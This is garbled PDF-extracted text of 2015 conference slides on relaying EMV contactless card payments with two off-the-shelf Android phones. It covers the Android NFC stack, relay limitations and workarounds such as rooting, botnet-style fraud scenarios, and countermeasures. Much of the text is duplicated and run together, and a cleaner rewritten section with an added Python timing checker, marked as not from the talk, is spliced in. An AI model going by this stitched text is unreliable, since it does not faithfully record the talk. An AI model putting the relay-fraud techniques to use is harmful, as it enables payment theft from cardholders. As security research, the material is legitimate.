J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36

Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support

Android 42 Jelly Bean (API level 17)

NfcBarcode

IsoPcdB(ISOIEC 14443-4B)

IsoPcdA(ISOIEC 14443-4A)

Android CyanogenMod OS 91

NfcA(ISOIEC 14443-3A)

NfcB(ISOIEC 14443-3B)

NfcV(ISOIEC 15693)

IsoDep(ISOIEC 14443-4)

NfcF(JIS 6319-4)

Ndef

Android 233 Gingerbread (API level 10)

NdefFormatable MifareClassic

MifareUltralight

Android 44 KitKat (API level 19)

thanks to Doug Year

Software

ReaderWriter

Peer-to-peer

Card-emulation

Hardware

Card-emulation

Software

ReaderWriter

Peer-to-peer

Hardware

Card-emulation NfcAdapterReaderCallback

added

NFC

op

erati

on

mod

es

su

pp

orte

d

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode

Not allowed to be set directlyrarr Android activity

Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)

Makes communication between layers and modules easier

User App

Tag

NFC developer framework

NfcService

mTagServicetransceive

IPC

TagService

DeviceHostTagEndPoint

ltltrealizegtgt

NativeNfcTag

JNI

doTransceive

System NFC Library

NativeNfcTagcpp

libnfc-nci

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36

Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode

A service must be implemented to process commands and replies

HostApduService abstract class and processCommandApdu methodAID-based routing service table

This means you need to declare in advance what AID you handle

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36

Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary

Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes

(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)

NFC Android kernel driver C Hardware and manufac-turer

Yes

NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer

Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci

httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc

httpnfc-forumorgour-workspecifications-and-application-documentsspecifications

nfc-controller-interface-nci-specifications

httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical

20Specificationpdf

httpwwwdatasheet4ucomPDF845670BCM20793Shtml

httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36

Android and NFC: A Tale of L♥ve (VI) – Some remarkable limitations

Limitation 1: the dishonest verifier communicates with a MIFARE Classic
- libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands
- Caused by the CRC computation performed by the NFCC
- Overcome if the NFCC is modified
- EMV contactless cards are IsoDep, fully ISO/IEC 14443-compliant

Limitation 2: the dishonest prover communicates with an honest verifier (device in HCE mode)
- The AID must be known in advance
- Overcome if the device is rooted
- The Xposed framework may help to overcome this issue, but it needs root permissions


Android and NFC: A Tale of L♥ve (V) – Some remarkable limitations and remarks

Limitation 3: the dishonest prover and the dishonest verifier communicate through a non-reliable peer-to-peer relay channel
- ISO/IEC 14443-4 defines the Frame Waiting Time as FWT = 256 · (16/fc) · 2^FWI, 0 ≤ FWI ≤ 14, where fc = 13.56 MHz
- FWT ∈ [500 µs, 5 s] → a relay is theoretically possible when the delay is ≤ 5 s

Concluding remarks
- Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed
- Any communication involving an APDU-compliant NFC tag (i.e. MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed

And now, let's move to the practice!


Relay Attack Implementation (I) – Experiment configuration

- PoS device: Ingenico IWL280 with GPRS + NFC support
- Android app developed (±2000 LOC)
- Two OTS Android NFC-capable devices
- One constraint: only the dishonest prover must run Android ≥ 4.4


Relay Attack Implementation (II) – Threat Scenarios – Scenario 1: Distributed Mafia Fraud

[Figure: a BOTMASTER coordinating several BOTs]


Relay Attack Implementation (III) – Threat Scenarios – Scenario 2: Hiding Fraud Locations


Relay Attack Implementation (IV) – Resistant mechanisms

Brief summary of resistant mechanisms:
- Distance-bounding protocols: upper-bounding the physical distance using the Round-Trip Time of cryptographic challenge-response messages
- Timing constraints: not enforced in current NFC-capable systems; the protocol itself allows timing extension commands
- Physical countermeasures:
  - Whitelisting/blacklisting: random UID in HCE mode → unfeasible
  - RFID blocking covers
  - Physical button/switch activation
  - Secondary authentication methods (e.g. on-card fingerprint scanners)
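The FWT formula from Limitation 3 and the "timing constraints" remark above, worked through as an added example (not code from the talk or from the authors' app): it computes FWT for every FWI and lets a terminal judge whether a response delay is protocol-legal, with and without honouring the protocol's own S(WTX) extension request. The sample delays are constructed; the WTXM range 1..59, the cap at the FWI=14 value and the default FWI=4 are taken from ISO/IEC 14443-4.

```python
"""ISO/IEC 14443-4 Frame Waiting Time (FWT) budget checker.

Added example (not code from the talk). Uses the slide's formula
    FWT = 256 * (16 / fc) * 2**FWI,  0 <= FWI <= 14,  fc = 13.56 MHz
plus the protocol's own extension mechanism, the S(WTX) request, which lets
the card multiply the current FWT by WTXM (1..59), capped at the FWI=14 value.
check_response_delay() is the decision an honest verifier (terminal) could
make; the slides' point is that a terminal honouring S(WTX) accepts delays
far beyond the nominal FWT, so FWT alone does not stop a relay.
"""
from dataclasses import dataclass
from typing import Optional

FC_HZ = 13.56e6             # ISO/IEC 14443 carrier frequency
FWI_MIN, FWI_MAX = 0, 14    # Frame Waiting Integer range
WTXM_MIN, WTXM_MAX = 1, 59  # multiplier carried in an S(WTX) request


def fwt_seconds(fwi: int) -> float:
    """Frame Waiting Time for a given FWI, in seconds (slide formula)."""
    if not FWI_MIN <= fwi <= FWI_MAX:
        raise ValueError(f"FWI must be in [{FWI_MIN}, {FWI_MAX}], got {fwi}")
    return 256 * (16 / FC_HZ) * 2 ** fwi


FWT_MAX = fwt_seconds(FWI_MAX)  # ~4.949 s: no extension may exceed this


def fwt_after_wtx(fwi: int, wtxm: int) -> float:
    """Temporary FWT granted by one S(WTX) request with multiplier wtxm."""
    if not WTXM_MIN <= wtxm <= WTXM_MAX:
        raise ValueError(f"WTXM must be in [{WTXM_MIN}, {WTXM_MAX}], got {wtxm}")
    return min(fwt_seconds(fwi) * wtxm, FWT_MAX)


@dataclass(frozen=True)
class Verdict:
    fwi: int
    observed_s: float
    budget_s: float            # the budget the response was judged against
    within_budget: bool
    wtxm_used: Optional[int]   # smallest WTXM that made it legal, if any


def check_response_delay(fwi: int, observed_s: float,
                         honour_wtx: bool = True) -> Verdict:
    """Decide whether a response delay is protocol-legal for a terminal.

    honour_wtx=False models a strict terminal that rejects S(WTX) and thus
    enforces the nominal FWT; honour_wtx=True models the usual behaviour,
    where one S(WTX) request can stretch the budget up to FWT_MAX.
    (Only a single S(WTX) round is modelled; a card may request further ones.)
    """
    nominal = fwt_seconds(fwi)
    if observed_s <= nominal:
        return Verdict(fwi, observed_s, nominal, True, None)
    if not honour_wtx:
        return Verdict(fwi, observed_s, nominal, False, None)
    for wtxm in range(WTXM_MIN, WTXM_MAX + 1):
        extended = fwt_after_wtx(fwi, wtxm)
        if observed_s <= extended:
            return Verdict(fwi, observed_s, extended, True, wtxm)
    return Verdict(fwi, observed_s, fwt_after_wtx(fwi, WTXM_MAX), False, None)


def fwt_table_microseconds() -> dict:
    """FWT for every legal FWI, in microseconds, for reference."""
    return {fwi: fwt_seconds(fwi) * 1e6 for fwi in range(FWI_MIN, FWI_MAX + 1)}


if __name__ == "__main__":
    print("FWI  FWT")
    for fwi, us in fwt_table_microseconds().items():
        print(f"{fwi:>3}  {us:>12.1f} us")
    # Constructed sample delays (not measurements from the talk): a direct
    # card tap and two relay-induced round trips of different magnitude.
    samples = [("direct tap", 0.003), ("short relay", 0.050), ("long relay", 2.0)]
    for fwi in (4, 14):  # FWI=4 is the standard default; 14 is the maximum
        for honour in (False, True):
            for name, delay in samples:
                v = check_response_delay(fwi, delay, honour_wtx=honour)
                status = "accepted" if v.within_budget else "REJECTED"
                ext = f" via S(WTX) x{v.wtxm_used}" if v.wtxm_used else ""
                print(f"FWI={fwi:>2} wtx={str(honour):5} {name:11} "
                      f"{delay * 1e3:8.1f} ms -> {status}{ext}")
```

The formula gives ≈302 µs at FWI=0 and ≈4.95 s at FWI=14, so the slide's 5 s upper bound is the figure that matters for the relay argument.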


Related Work – On relay attacks

- 2005–2009: first works, built on specific hardware
- 2010: Nokia mobile phones with NFC capability plus a Java MIDlet app
- 2012–2013: relay attacks on Android accessing Secure Elements (an SE securely stores the data associated with credit/debit cards); needs a non-OTS Android device
- 2014: active relay attacks with custom hardware and custom Android firmware
- Several works studied the delay over the relay channel: relays over long distances are feasible → latency isn't a hard constraint

Ask us for specific references: too many names for a single slide.


Conclusions (I)

- The security of NFC is based on the physical proximity concern
- NFC threats: eavesdropping, data modification, relay attacks
- Android NFC-capable devices are rising: they can be abused to interact with cards in their proximity

Conclusions:
- Review of the Android NFC stack
- Proof-of-Concept of relay attacks using Android OTS devices
- Threat scenarios introduced
- Virtual pickpocketing attacks may appear before long


Conclusions (II) – But then, what the hell can I do? Should I run away?


Conclusions (III)

Future work:
- Develop a botnet infrastructure and earn money
- Timing constraints of Android HCE mode
- Try active relay attacks within EMV contactless cards

Acknowledgments:
- Spanish National Cybersecurity Institute (INCIBE)
- University of León, under contract X43
- HITB staff

And thanks to all for hearing us!

Visit http://vwzq.net/relaynfc for more info about the project.

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 24: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperate

Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36

Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support

Android 42 Jelly Bean (API level 17)

NfcBarcode

IsoPcdB(ISOIEC 14443-4B)

IsoPcdA(ISOIEC 14443-4A)

Android CyanogenMod OS 91

NfcA(ISOIEC 14443-3A)

NfcB(ISOIEC 14443-3B)

NfcV(ISOIEC 15693)

IsoDep(ISOIEC 14443-4)

NfcF(JIS 6319-4)

Ndef

Android 233 Gingerbread (API level 10)

NdefFormatable MifareClassic

MifareUltralight

Android 44 KitKat (API level 19)

thanks to Doug Year

Software

ReaderWriter

Peer-to-peer

Card-emulation

Hardware

Card-emulation

Software

ReaderWriter

Peer-to-peer

Hardware

Card-emulation NfcAdapterReaderCallback

added

NFC

op

erati

on

mod

es

su

pp

orte

d

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode

Not allowed to be set directlyrarr Android activity

Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)

Makes communication between layers and modules easier

User App

Tag

NFC developer framework

NfcService

mTagServicetransceive

IPC

TagService

DeviceHostTagEndPoint

ltltrealizegtgt

NativeNfcTag

JNI

doTransceive

System NFC Library

NativeNfcTagcpp

libnfc-nci

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36

Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode

A service must be implemented to process commands and replies

HostApduService abstract class and processCommandApdu methodAID-based routing service table

This means you need to declare in advance what AID you handle

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36

Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary

Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes

(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)

NFC Android kernel driver C Hardware and manufac-turer

Yes

NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer

Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci

httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc

httpnfc-forumorgour-workspecifications-and-application-documentsspecifications

nfc-controller-interface-nci-specifications

httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical

20Specificationpdf

httpwwwdatasheet4ucomPDF845670BCM20793Shtml

httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV)Resistant Mechanisms

Brief summary of resistant mechanismsDistance-bounding protocols

Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages

Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands

Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 25: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperate

Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36


Android and NFC: A Tale of L♥ve (I)
Recap on evolution of Android NFC support

[Timeline figure; only its text is recoverable]
